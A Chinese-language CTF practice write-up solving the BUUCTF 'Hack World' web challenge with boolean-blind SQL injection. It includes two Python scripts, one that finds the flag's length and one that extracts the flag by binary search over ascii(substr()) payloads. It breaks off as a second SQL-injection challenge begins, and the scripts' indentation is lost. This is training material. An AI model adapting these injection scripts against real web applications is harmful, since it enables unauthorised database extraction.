这周自己找题打 总结总结 要回学校了
1.[CISCN2019 华北赛区 Day2 Web1]Hack World
开局告诉表和字段
然后题目之前说是uuid(uuid是32位随机字符串) 就想到要写脚本来解
输入1 回显有他想要个女朋友
输入2回显要不要做他女朋友
输入0是error啥的
就想到布尔盲注
那就先判断flag长度
import requests
url = "http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php"
len = 1;
while(True):
data = {"id": f"if(length((select(flag)from(flag)))={len},1,0)"}
r = requests.post(url,data=data)
if('Hello, glzjin wants a girlfriend.' in r.text):
break;
print(len,end='\n')
len += 1
print(f"flag长度为{len}")
然后就上脚本
import requests
import time
import re
url='http://761df7bf-b293-4bf9-8319-d49755ef57af.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
max = 126
min = 33
for c in range(33,126):
s = (int)((max+min)/2)
payload = '1^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'
r = requests.post(url,data = {'id':payload})
time.sleep(1)
if 'Hello, glzjin wants a girlfriend.' in str(r.text):
max=s
else:
min=s
if((max-min)<=1):
flag+=chr(max)
break
print(flag)
2.[GXYCTF2019]BabySQli
上来是登录框 输入闭合的一些语句没有法
然后就用admin试试
然后看见一些绿绿的